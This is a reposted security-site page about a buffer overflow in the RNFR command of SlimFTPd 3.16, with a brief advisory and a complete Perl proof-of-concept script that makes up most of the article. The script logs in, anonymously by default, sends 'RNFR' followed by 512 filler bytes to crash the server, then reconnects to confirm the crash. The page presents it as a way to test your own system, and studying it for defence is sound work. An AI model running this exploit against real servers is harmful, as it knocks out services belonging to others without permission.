首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SlimFTPd RNFR Buffer Overflow
来源:http://acolytez.com 作者:k0r0l 发布时间:2005-07-27  

SlimFTPd RNFR Buffer Overflow (Exploit)

Summary
"SlimFTPd is a fully standards-compliant FTP server implementation with an advanced virtual file system."

Due to lack of proper length checking routines in SlimFTPd, attackers are able to to execute arbitrary code by overflowing a buffer the program uses. The following exploit code can be used to test your system for the mentioned vulnerabilities.

Credit:
The information has been provided by Dim K0r0l.

Details
Vulnerable Systems:
* SlimFTPd version 3.16

Immune Systems:
* SlimFTPd version 3.17

Exploit:
#!/usr/bin/perl

# --------------------------------------------------- #
# 47slimftpd_bof.pl - PoC exploit for SlimFTPd Server #
# version 3.16 #
# bug found by ml-bugtraq at twilight-hall.net #
# #
# coded by k0r0l from acolytez team #
# visit http://acolytez.com for details #
# --------------------------------------------------- #

use Net::FTP;

# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

# ===========

if (($host) && ($port)) {

# make exploit string
$exploit_string = "RNFR ";
$exploit_string .= "X"x512;
# ===================

print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Logging...\n";
if (!$user) {
$user = "anonymous";
$pass = "ftp@ftp.com";
}
$sock->login($user, $pass);
$answer = $sock->message;
print "Sending string...\n";
$sock->quot($exploit_string);
print "Server $host may be down. Checking...\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => $debug) or die "[-] Connection failed\n";
if ($sock) {print "[-] Exploit failed.\n";} else {print "[+] Server crashed!\n";}
} else {
print "SlimFTPd Server - PoC Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n";
}

#EoF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Netquery Command Execution
·FTPshell Server DoS
·Stealth Background Process
·FtpLocate Command Execution
·SlimFTPd <= 3.16 LIST Comma
·SQL Injection in Product Cart
·phpSlash Account Hijacking
·@Mail multiple variable cross-
·OpenBB CID SQL Injection
·CA BrightStor ARCserve Backup
·GNU Mailutils imap4d Format St
·CA BrightStor ARCserve Backup
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved